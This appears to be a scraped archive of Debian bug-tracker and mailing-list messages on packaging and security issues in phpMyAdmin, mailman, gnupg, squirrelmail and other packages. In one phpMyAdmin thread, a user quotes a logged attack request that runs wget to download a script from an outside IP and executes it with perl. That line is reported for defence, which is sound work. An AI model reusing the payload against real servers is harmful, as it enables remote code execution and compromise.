On sneon 2 Jannewaris 2010, Michal Čihař wrote:
Ah, the problem is that we use system mootools instead of the one
shipped with phpMyAdmin and it looks like there was both mootools and
mootools-extra combined in one file, what causes the extra classes to
be missing. Still thinking about proper
Package: php5-imagick
Version: 2.1.1RC1-1
Severity: normal
Hi,
The shipped imagick.ini config file snippet uses deprecated config file
comment syntax. This leads to a message like follows for each CLI
invocation:
PHP Deprecated: Comments starting with '#' are deprecated in
Package: php5-symfony1.0
Version: 1.0.21-1.1
Severity: grave
Justification: makes package uninstallable
Hi,
When I try to install the package, it tries to overwrite a symlink that is
shipped by 'php-pear', namely /usr/share/php/doc:
The following NEW packages will be installed:
On woansdei 30 Desimber 2009, Tobias Diedrich wrote:
Thanks for your report. I am adding '-loop' to the list in
postfix-to-mailman.py under the # Check for control extension on local
part comment. Can you confirm that this resolves your problem?
I think it should rather be added to the #
On woansdei 30 Desimber 2009, Tobias Diedrich wrote:
I have to correct myself here a bit after looking at the postmaster
message again:
The 'message needs to be moderated mail' goes to -owner.
mailman expands owner to someu...@t-online.de and sends it with
envelope sender mailman-bounces
to changelog.Debian Thijs Kinkhorst broke it for mm 1:2.1.8-2.
Yeah, and that fix for #305762 is wrong. Postfix needs to make
exceptions for mailman lists if it is configured non-standard.
You are right. I didn't at the time perceive these negative rammifications of
the change. It will be reverted
On sneon 26 Desimber 2009, Giuseppe Iuculano wrote:
CVE-2009-4412[0]:
| Unrestricted file upload vulnerability in Serendipity before 1.5
| allows remote authenticated users to execute arbitrary code by
| uploading a file with an executable extension followed by a safe
| extension, then
severity 561641 normal
tags 561641 moreinfo
thanks
On sneon 19 Desimber 2009, th...@thing.dyndns.org wrote:
Segfault is as follows,
- Dec 19 16:50:20 warlock kernel: [ 831.591136] apache2[2408]: segfault at
0 ip b6e1681f sp bfcc5c3d error 6 in pdo.so[b6e11000+14000] This can be
repeated
On Sun, December 27, 2009 06:42, Tobias Diedrich wrote:
One of my list admins uses a T-Online account, which rejects spam,
creating a mail loop.
Mailman detects this and tries to send the message to mailman-l...@domain,
which fails because I use postfix-to-mailman.py for the domain and it
On moandei 21 Desimber 2009, J.M.Roth wrote:
within a few weeks, when Lenny is out of the door
So? ;-)
I'm afraid we're low on manpower for this package. I've asked Jeroen whether
we should ask for more maintainers and/or give it up for adoption..
cheers,
Thijs
signature.asc
Description:
into it again.
OK.
--
Thijs Kinkhorst th...@uvt.nl – LIS Unix
Universiteit van Tilburg – Library and IT Services • Postbus 90153, 5000 LE
Bezoekadres Warandelaan 2 • Tel. 013 466 3035 • G 236 • http://www.uvt.nl
signature.asc
Description: This is a digitally signed message part.
short term. I think this is appropriate
because: (1) the bug has been open for a year without maintainer activity,
(2) the package hasn't been uploaded in 3 years, (3) maintainers are on
lowthresholdNMU.
cheers,
Thijs
--
Thijs Kinkhorst th...@uvt.nl – LIS Unix
Universiteit van Tilburg
Package: libphp-phpmailer
Version: 2.3-2
Severity: wishlist
Hi,
A new upstream version is available: 5.1.0.
Would be nice if it could be packaged so it will be included in Squeeze
before that freezes.
thanks,
Thijs
-- System Information:
Debian Release: 5.0.3
APT prefers stable
APT
Package: lintian
Version: 2.2.18
Severity: wishlist
Hi,
sudo supports an /etc/sudoers.d/ directory in which config snippets can be
placed. The README in that dir states that files there should have 0440 file
mode. Lintian could therefore be taught not to emit this warning:
W:
tag 557181 pending
thanks
On freed 20 Novimber 2009, jida...@jidanni.org wrote:
Therefore please add a warning the man page:
Due to the limitations of Contents-*.gz files, **directories, empty or
not, are not found**. This is in contrast to dlocate(1). E.g., one might
end up with no idea
Package: sudo
Version: 1.7.2p1-1
Severity: minor
Hi,
The sudo man pages in this version have unsubstituted substitution
variables. Two examples from sudoers(5):
If no value is specified, a value of once is implied. Negating the
option results in a value of never being used.
Package: mpc
Version: 0.12.1-1
Severity: important
Tags: ipv6
Hi,
Our mpd runs on a host with both an IPv4 and an IPv6 address. My workstation
only has an IPv4 address (but does have the ipv6 kernel module loaded as per
Debian default). This makes mpc fail with Network is unreachable.
Hi Jan,
On Monday, 7. September 2009, Thijs Kinkhorst wrote:
A number of Nagios plugins include useful functionality when connecting
over SSL: they check if the certificate is still valid and report a
warning or error when it (soon) expires.
Attached is a patch that in the shipped
On tiisdei 3 Novimber 2009, Mantas Kriaučiūnas wrote:
Hi,
On Mon, 2 Nov 2009, Thijs Kinkhorst th...@debian.org wrote:
On moandei 2 Novimber 2009, Marc Randolph wrote:
This issue is turning out to be a pretty big deal... it has generated
something on the order of 10 bug reports a day
Hi Marc,
On moandei 2 Novimber 2009, Marc Randolph wrote:
This issue is turning out to be a pretty big deal... it has generated
something on the order of 10 bug reports a day for Ubuntu
(https://bugs.launchpad.net/ubuntu/+source/msttcorefonts) since 9.10 was
released a week ago. If anyone
to address open security issues.
+(CVE-2008-4810, CVE-2008-4811, CVE-2009-1669,
+closes: #529810, #504328)
+ * Remove installation of smarty_icon.README and unit_test,
+dropped upstream.
+
+ -- Thijs Kinkhorst th...@debian.org Sat, 24 Oct 2009 12:40:12 +0200
+
smarty (2.6.22-1) unstable
Package: tmpreaper
Version: 1.6.10
Severity: minor
Hi,
Installing tmpreaper gives you the debconf question about security. The
action to take is not entirely accurate anymore:
If after that you still want tmpreaper to run, please edit
/etc/tmpreaper.conf and remove the line:
.
echo Please
On Tue, October 13, 2009 11:45, Debian Bug Tracking System wrote:
retitle 550822 gnupg: gnupg (squeeze) depends on dpkg (= 1.15.4) found
in Changed Bug title to 'gnupg: gnupg (squeeze) depends on dpkg (=
1.15.4)
found in unstable'
Well, indeed it does. But gnupg declares this dependency
Hey all,
There are three open security issues in Smarty, details are in bugs
#504328 and #529810. Are there plans to upload fixed packages sometime
soon (at least for unstable)?
thanks,
Thijs
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe.
Package: kmail
Version: 4:3.5.9-5
Severity: normal
Hi,
There's a reproducible crash (segfault) in kmail, at least in oldstable and
stable. How to reproduce:
1) Send yourself an email that requests a read receipt.
2) Click on the email. A dialog appears with the question what to do with
this
On tiisdei 6 Oktober 2009, Daniel Skorka wrote:
The way the package tries to get the fonts isn't very clever. If the
first (two or three, it seems) mirrors fail, the remaining mirrors are
not tried. This has, in my case, happend consistently for several days,
preventing the installation of all
On tiisdei 6 Oktober 2009, Daniel Skorka wrote:
It would be nice if this package offered the option of specifying a path
where to look for the .ttf files instead of downloading them. This way,
one could for example just grab them from an existing windows
installation. A MD5 sum check could
On snein 27 Septimber 2009, Paul Wise wrote:
Package: merkaartor
Version: 0.14+svnfixes~20090912-1
Severity: important
Tags: security
Found a minor symlink attack in merkaartor. It allows a local attacker
to append the contents of the merkaartor log file to arbitrary files
owned by the
Package: qa.debian.org
Severity: minor
Hi,
The PTS page for gnupg displays this as TODO:
# Updating gnupg introduces news bugs: #546552, #545275.
Which has a typo in news.
cheers,
Thijs
signature.asc
Description: This is a digitally signed message part.
On snein 19 April 2009, Cristian Rigamonti wrote:
The upstream source package contain a very useful script to produce daily
statistics and error reports: /contrib/mmdsr
Why is this not included in the Debian package?
It can not simply be copied into the package as it will not work without
Hi Paul,
p...@mail:~$ ps -fe | grep find
root 6846 5473 9 12:50 pts/0 00:00:39 find /var/lib/mailman/
-type d -exec chmod g+s {} ; paul 11875 31817 0 13:01 pts/48
00:00:00 grep find
It's still running. Ah, at 13:03 it's done.
is more efficient, is there an expectation
forcemerge 544046 391000
thanks
On tongersdei 7 Maaie 2009, Ricardo Ramirez wrote:
FYI, my site has extensive archives including attachments in
/var/lib/mailman/archive so when the permissions are fixed it takes an
extraordinary amount of time.
Indeed, this is not really necessary so it will
severity 524662 important
tags unreproducible moreinfo
thanks
Hi,
from http page:
**
Bug in Mailman version 2.1.11
We're sorry, we hit a bug!
admin(7526): [- Mailman Version: 2.1.11 -]
admin(7526): [- Traceback --]
admin(7526): Traceback (most recent call last):
Hi,
Thanks. I am aware of the issue, but since the patch is of rather high impact
I need to study a bit on the correct way of getting it into Debian.
cheers,
Thijs
signature.asc
Description: This is a digitally signed message part.
On Sun, September 6, 2009 00:15, Christoph Anton Mitterer wrote:
May I suggest that you use SH512 instead of SHA256 for checksuming the
downloaded files, for security reasons?
I'm not sure what concrete value this change would add. Both 512 and 256
are accepted, non-broken hashes and seem
tags 545268 pending
thanks
Hi Andreas,
On Sun, September 6, 2009 08:42, Andreas Metzler wrote:
which dh_bugfiles dh_bugfiles exits with nonzero exit code if
dh_bugfiles is not present. The fix is simple:
Thanks, I have verified that gnupg builds successfully on lenny with this
fix applied.
Hi all,
On Sun, September 6, 2009 09:47, Andreas Metzler wrote:
the new gnupg now *depends* on libcurl3-gnutls. gnupg is priority
important and a part of base system since debian-archive-keyring
depends on it.
Daniel, can you look into this issue, since you're the one who made the
change
Package: nagios-plugins-basic
Version: 1.4.12-5
Severity: wishlist
Hi,
A number of Nagios plugins include useful functionality when connecting over
SSL: they check if the certificate is still valid and report a warning or
error when it (soon) expires.
I end up enabling this functionality in my
On Tue, August 25, 2009 15:58, Michele Bonera wrote:
Il Tuesday 25 August 2009 14:12:01 Nico Golde ha scritto:
* Michele Bonera mich...@bonera.biz [2009-08-25 13:43]:
Package: phpmyadmin
Version: 4:2.9.1.1-11
Severity: grave
Tags: security
Justification: user security hole
After
Hi,
The TC has decided on the following resolution for the group staff issue:
| 2. Decide to change the default so that /usr/local is not writeable by
| group staff anymore. This change should only be implemented after an
| appropriate transition plan exists which enables system
On Tue, August 11, 2009 22:53, Russ Allbery wrote:
Thijs Kinkhorst th...@debian.org writes:
The TC has decided on the following resolution for the group staff
issue:
| 2. Decide to change the default so that /usr/local is not writeable
by | group staff anymore. This change should only
On Tue, August 11, 2009 23:22, Russ Allbery wrote:
Thijs Kinkhorst th...@debian.org writes:
I'm not sure it's entirely equivalent, as the directory in the new
situation would be owned by group 0 / root. This is clearly a special
group just as user root is a special user; much more clearly
: #286301).
+
+ -- Thijs Kinkhorst th...@debian.org Mon, 03 Aug 2009 21:34:12 +0200
+
portmap (6.0-10) unstable; urgency=low
* Merge from Ubuntu
signature.asc
Description: This is a digitally signed message part.
This is CVE-2009-0696 and CERT VU#725188.
Please reference them in any relevant changelogs.
signature.asc
Description: This is a digitally signed message part.
On moandei 27 July 2009, Olaf Zaplinski wrote:
I used to have mailman running at list1.foo.bar. After some time, I purged
mailman. About half a year later I reinstalled mailman and configured it at
list2.bar.foo.
When I open my browser on http://list2.bar.foo/mailman/admin/mailman and
klick
reopen 517860
thanks
Hi,
I don't think this bug was actually fixed. The changelog entry also does not
match the bug content:
* Fixes section number in zebra.8 manpage. Closes: #517860
The bug is about a TCP port number, not manpage section number.
cheers,
Thijs
signature.asc
Package: php5
Version: 5.3.0-2
Hi all,
I've been trying the new php5 packages from experimental. One thing that
immediately broke my installation is that short_open_tag was turned off in
the default configuration. I'm very unsure that we should be doing that: in
my experience many
On sneon 11 July 2009, Gerrit Pape wrote:
On Fri, Jul 10, 2009, Florian Weimer wrote:
[something about http://bugs.debian.org/516394]
A misunderstanding again, I'm asking about the bug
http://bugs.debian.org/518169
The packages I prepared for stable are available since more than four
Hi,
You may have heard of the rumours that there's a new OpenSSH exploit but
it's unclear what this exploit actually is or whether it even exists:
http://isc.sans.org/diary.html?storyid=6742
However, one consistent claim is that the current version of OpenSSH
isn't affected. It would make sense
On Sat, July 4, 2009 21:47, arne anka wrote:
now, it works again.
i had some issues with the newly upgraded ia32-apt-get -- i'd guess the
very same issues made apt-file break.
anyway, any useful error messages would be highly appreciated, getting the
help when you are sure you did nothing
Hi Håkan,
version 1:1.5.2-5 that I released to unstable is suitable for stable
aswell. Prior to this bugfix unstable and stable both contained
version 1:1.5.2-4. Attached is a patch with the fix. Do you want me to
build it for stable aswell?
Thank you for getting in touch with us. Judging
On Sat, July 4, 2009 20:16, arne anka wrote:
Package: apt-file
Version: 2.2.2
Severity: normal
running apt-file update only results in a listing of the help (ie the same
output as apt-file --help).
Thanks for reporting, but I cannot reproduce this. Can you please paste
the full original
On tiisdei 30 Juny 2009, Gerrit Pape wrote:
While we wait for who knows how long, I suggest we get the fix for
#518169 into stable; packages still are available through
http://niequai.smarden.org/ruGho2e/
Hi, I don't understand why the confirmed fix for the reproducible bug
with security
Hi Laurant,
After looking at my logs, I did notice a lot of attempts to break in
phpmyadmin through the following kind of url:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%20/t
On moandei 29 Juny 2009, Michal Čihař wrote:
82.79.155.33 - - [29/Jun/2009:03:32:31 +0200] GET
//phpmyadmin//config.inc.php?c=wget%20http://188.24.50.187/50.txt%20-O%
20/t mp/50.txt;perl%20/tmp/50.txt%20%3E%3E/dev/null
It seems PHPMyAdmin shipped with Lenny is still vulnerable to
On moandei 29 Juny 2009, Michal Čihař wrote:
No, in the log, he is using exploited config file (with some custom
code inside).
Ah right. I don't think there's a way we can realistically do anything about
an already-compromised installation. That is a general truth for any
vulnerability: how
On tongersdei 25 Juny 2009, Olaf van der Spek wrote:
I've no idea how the phpinfo() ended up in this file, but I've seen it on
multiple servers. Could this be a vulnerability in phpMyAdmin? Or some bug
in the Debian package?
Hi Olaf,
As it seems this is the result of a phpMyAdmin worm that
On tiisdei 9 Juny 2009, Ben Hutchings wrote:
Package: linux-2.6
Version: 2.6.29-5
Severity: critical
Tags: security patch
Some or all NICs supported by r8169 seem to ignore the buffer sizes in
RX descriptors, and will write up to the global maximum frame size.
This means a remote attacker
Package: wnpp
Severity: wishlist
Owner: Thijs Kinkhorst th...@debian.org
* Package name: ttytter
Version : 0.9.5
Upstream Author : Cameron Kaiser http://twitter.com/doctorlinguist
* URL : http://www.floodgap.com/software/ttytter/
* License : Floodgap Free
reassign 531152 ftp.debian.org
thanks
On sneon 30 Maaie 2009, Dominic Hargreaves wrote:
Package: security.debian.org
Severity: normal
There is a libperl5.8 binary package in lenny security updates:
libperl5.8:
Installed: (none)
Candidate: 5.8.8-11.1+lenny1
Version table:
On tiisdei 26 Maaie 2009, Daniel Kahn Gillmor wrote:
My experience is that subkeys.pgp.net has many more non-responsive
nodes, and that pool.sks-keyservers.net is more active in clearing out
non-responsive keyservers from its round-robin DNS.
Of course, this could change at the whim of the
Hi Daniel,
On Sat, May 9, 2009 17:37, Daniel Kahn Gillmor wrote:
SHA-1 is significantly weakened, and we should be strongly encouraging
new certifications to be something stronger (SHA-256 at least) [0]. Caff
should do this automatically.
something like:
# $CONFIG{'cert-digest-algo'} =
On Sat, May 9, 2009 16:52, Daniel Kahn Gillmor wrote:
Currently, caff defaults to using subkeys.pgp.net as its keyserver.
The various SKS keyservers seem to currently be significantly more
robust than subkeys.pgp.net
I recommend switching the default keyserver to either keys.gnupg.net or
Beste Jean-Louis,
On Tue, May 26, 2009 10:56, Jean-Louis Dupond wrote:
Package: dutch
Version: 1:1.00-2
The myspell-nl package only contains dictionary for nl_NL, but it should
include nl_BE also, as its just the same dict. The fix is quite easy, just
need to add additional symlinks to the
Beste Jean-Louis,
On Tue, May 26, 2009 13:16, Jean-Louis Dupond wrote:
Beste Thijs,
OpenOffice gebruikt bijvoorbeeld nl_BE. Spellingschecker bij OpenOffice
werkt niet wanneer hij op Nederlands (Belgie) staat.
Maar na het aanmaken van die 4 symlinks werkt het perfect. Ook google
geeft
aan
On Tue, May 26, 2009 13:59, Kevin Fernandez wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Does the debian security update include the fix of squirrelmail 1.4.19?
Have you read this?
http://lists.debian.org/debian-security-announce/2009/msg00116.html
Thijs
--
To UNSUBSCRIBE,
forwarded 530281 http://bugs.php.net/48389
thanks
On sneon 23 Maaie 2009, Marc Dequènes (Duck) wrote:
Please consider applying this patch which fixes POSIX
incompatibilities responssible for the FTBFS on Hurd, and IPv6 support
deactivation (on this arch only), as it is not yet available.
Hi Peter,
Sorry for not getting back to this earlier.
On moandei 6 April 2009, Peter Palfrader wrote:
m...@book:/% sudo gpg --keyring etc/apt/trusted.gpg --verify
var/lib/apt/lists/localhost_debian_dists_sid_Release.gpg
var/lib/apt/lists/localhost_debian_dists_sid_Release gpg: WARNING:
Package: lintian
Version: 2.2.10
Severity: minor
Hi,
My package 'gnupg' generates the following info-level tag:
duplicate-short-description gnupg gnupg-udeb
I believe this may be inappropriate where the description overlap is
between the deb and its associated udeb. In the Lintian report
Package: nagios-nrpe-server
Severity: wishlist
Hi,
The NRPE server by default reads config snippets from /etc/nagios/nrpe.d:
# you can place your config snipplets into nrpe.d/
include_dir=/etc/nagios/nrpe.d/
This directory however is not shipped in the .deb. It would make sense to
me
Package: php5
Severity: wishlist
Perhaps we should add php5-suhosin as a Recommends of php5. To me it seems
altogether wise to install this extension and in its default state it doesn't
do much explicit harm. Doing so would stimulate more people to secure their
PHP5 setups. If you really don't
forcemerge 529329 529328
tags 529329 fixed-upstream
thanks
You wrote:
Warning: Invalid argument supplied for foreach() in
/usr/share/squirrelmail/plugins/filters/filters.php on line 427
Thank you for your report, this is indeed a bug. It has been fixed upstream in
the meanwhile, and will be
We are not fixing this bug in etch, because fixing it requires changing
behaviour and that's not desirable in a stable release. The issue is not very
grave.
From squirrelmail/2:1.4.9a-4 on, a solution is to put the following in your
config.php:
$only_secure_cookies = true;
signature.asc
tag 528833 pending
thanks
Date: Sun May 17 14:35:36 2009 +0200
Author: Thijs Kinkhorst th...@debian.org
Commit ID: aaeedb8c4b6b7723fd393c3425ccbdb65b22eb30
Commit URL:
http://git.debian.org/?p=pkg-php/php.git;a=commitdiff;h=aaeedb8c4b6b7723fd393c3425ccbdb65b22eb30
Patch URL:
http
tag 528833 pending
thanks
Date: Sun May 17 14:36:29 2009 +0200
Author: Thijs Kinkhorst th...@loeki.tv
Commit ID: eeea0ad042028b9cf8c7bcfe36303a005741b50c
Commit URL:
http://git.debian.org/?p=pkg-php/php.git;a=commitdiff;h=eeea0ad042028b9cf8c7bcfe36303a005741b50c
Patch URL:
http://git.debian.org
On sneon 16 Maaie 2009, Daniel Hahler wrote:
In the description of php5-cli it says:
This package provides the /usr/bin/php5 command interpreter, useful
for testing PHP scripts from a shell, or perhaps even performing general
shell scripting tasks, if you're frightened of perl and
tags 528787 unreproducible
thanks
Hi Arthur,
On freed 15 Maaie 2009, Arthur Furlan wrote:
I'm getting trouble in Firefox/Iceweasel to read and download
attachment files that use special characters like á, à, é, è,
ç, etc. in its name. When I click to download them I got an error
page in
Package: cyrus-sasl2
Severity: serious
Tags: security
Hi,
The following vulnerability has been published for Cyrus SASL:
Cyrus SASL library buffer overflow vulnerability
Overview
The Cyrus SASL library contains a buffer overflow vulnerability that could
allow an attacker to execute code or
On woansdei 13 Maaie 2009, Philippe Teuwen wrote:
several security fixes
Thanks for the report. I'm already aware and updates will follow as soon as
possible.
Thijs
signature.asc
Description: This is a digitally signed message part.
Package: squirrelmail-logger
Version: 2.3-2
Severity: normal
Hi Hauke,
Thanks for your great work on packaging the logger plugin. However, installing
it does not start to log things by default. I think it should do this - packages
should provide a working configuration if possible.
It makes
On moandei 11 Maaie 2009, CJ Fearnley wrote:
The Message-ID is the only guaranteed to be available on all systems
method (I've confirmed that sendmail, postfix, and exim all log Message-ID
by default) to ensure that site operators have access to the Authenticated
username who used or abused
tags 527964 -patch
severity 527964 wishlist
thanks
Hi,
On sneon 9 Maaie 2009, CJ Fearnley wrote:
If a user of squirrelmail sends spam, for example, or, in general,
if the admin needs to find out who the sender of a particular e-mail
logged by the MTA is, then the current version provides
On tongersdei 7 Maaie 2009, Daniel Leidert wrote:
This issue has been fixed for both GnuPG versions in upstream SVN revision
4993 (1.4) and 4994 (2.x). See https://bugs.g10code.com/gnupg/issue1034.
The patch is attached.
@Thijs: Does this fix/issue qualify for an update of the packages in
This is CVE-2009-1358.
Please reference it in the appropriate changelog entry.
Thanks,
Thijs
signature.asc
Description: This is a digitally signed message part.
Package: slurm-llnl
Version: 1.3.6-1
Severity: grave
Tags: security patch pending
The following issue has been reported on the slurm-llnl mailinglist.
Updated packages are in preparation.
-- Forwarded Message --
A security flaw has been discovered in all releases of SLURM
On Mon, April 20, 2009 15:53, Michael S. Gilbert wrote:
On Mon, 20 Apr 2009 12:52:28 +0200, Thijs Kinkhorst wrote:
On Mon, April 20, 2009 06:15, Michael S. Gilbert wrote:
i was looking at the link as provided in redhat's announcement. this
seems to be CVE-2009-1285, which debian is already
This is CVE-2009-1300.
Please add it in the relevant package changelog.
signature.asc
Description: This is a digitally signed message part.
On Tue, March 31, 2009 00:05, José Illescas Pérez wrote:
I think that repo of latest security updates in Security Information Web
is incorrect. The current repo in this web page is:
deb http://security.debian.org/ lenny/updates main contrib non-free
and don't work. I can't download
tags 521884 pending
thanks
Hi Neil,
On moandei 30 Maart 2009, Neil Williams wrote:
This test in debian/rules has reversed the logic of the test:
ifneq (,$(findstring nocheck,$(DEB_BUILD_OPTIONS)))
make -C build-deb/checks check || exit 1
endif
You are indeed completely correct. Thanks
On Tue, March 24, 2009 19:51, Luk Claes wrote:
Thijs Kinkhorst wrote:
On Tue, March 24, 2009 11:34, Gerrit Pape wrote:
On Mon, Feb 23, 2009 at 04:37:29PM +0100, Thijs Kinkhorst wrote:
Gerrit, it would be great if you could provide updated packages for
stable-security and oldstable
On Tue, March 24, 2009 11:34, Gerrit Pape wrote:
On Mon, Feb 23, 2009 at 04:37:29PM +0100, Thijs Kinkhorst wrote:
Gerrit, it would be great if you could provide updated packages for
stable-security and oldstable-security. Please upload them to
security-master, and make sure you build
# Automatically generated email from bts, devscripts version 2.10.35lenny3
# via tagpending
#
# mailman (1:2.1.12-2) UNRELEASED; urgency=low
#
# * Apply patch from Tanguy Ortolo updating postfix-to-mailman
#instructions to avoid backscatter mail (Closes: #520040).
#
package mailman
tags
On tiisdei 17 Maart 2009, Tanguy Ortolo wrote:
I think the most beautiful way to use Mailman with Postfix is to dedicate
it a domain, and to use the specific transport to relay mail to it. But… as
Postfix does not know the valid addresses, messages to invalid recipients
are treated with
On tiisdei 3 Febrewaris 2009, Lionel Elie Mamane wrote:
IOError: [Errno 2] No such file or directory:
'/var/lib/mailman/locks/mailman.lock.tofu.14934.0' Starting Mailman master
qrunner: mailmanctl.
This seems to happen still. I'd appreciate it if anyone could look into it.
Thijs
--
To
reassign 518292 ftp.debian.org
thanks
Hi Mark,
On Thu, March 5, 2009 10:29, Mark Hindley wrote:
I have just has a bug report for apt-cacher (#517874) which I have
tracked down to the Last-Modified times on s.d.o.
The file was
On tiisdei 3 Maart 2009, Russ Allbery wrote:
Thijs Kinkhorst th...@debian.org writes:
I get the following output when I check a mailman source package.
$ lintian mailman_2.1.12-1.dsc
Use of uninitialized value $_ in substitution (s///) at
/usr/share/lintian/collection/file-info line 50
Package: quagga
Version: 0.99.11-1
Severity: minor
Tags: patch
Hi,
The man page for zebra(8) mentions as port number to connect to 2602, but
it's acutally 2601 (as shown in /etc/services). 2602 belongs to ripd.
Attached patch fixes this typo.
thanks,
Thijsdiff -Nur
Mailman 3 removes the need for the site list. I concur that this is hence
wontfix as the extra effort to remove it in Debian for 2.1 is not warranted.
Thijs
signature.asc
Description: This is a digitally signed message part.
tags 176439 wontfix
noowner 176439
thanks
While I do agree with the principles outlined in these bugs that are pro
split-up, I do not think we should do it at this point. Mailman 3 removes all
arch-dep components, so a split is then not relevant anymore. I know MM 3 is
not around the corner
Package: lintian
Version: 2.2.6
Severity: normal
Hi,
I get the following output when I check a mailman source package.
$ lintian mailman_2.1.12-1.dsc
Use of uninitialized value $_ in substitution (s///) at
/usr/share/lintian/collection/file-info line 50, INDEX line 1.
Use of uninitialized
901 - 1000 of 2622 matches
Mail list logo
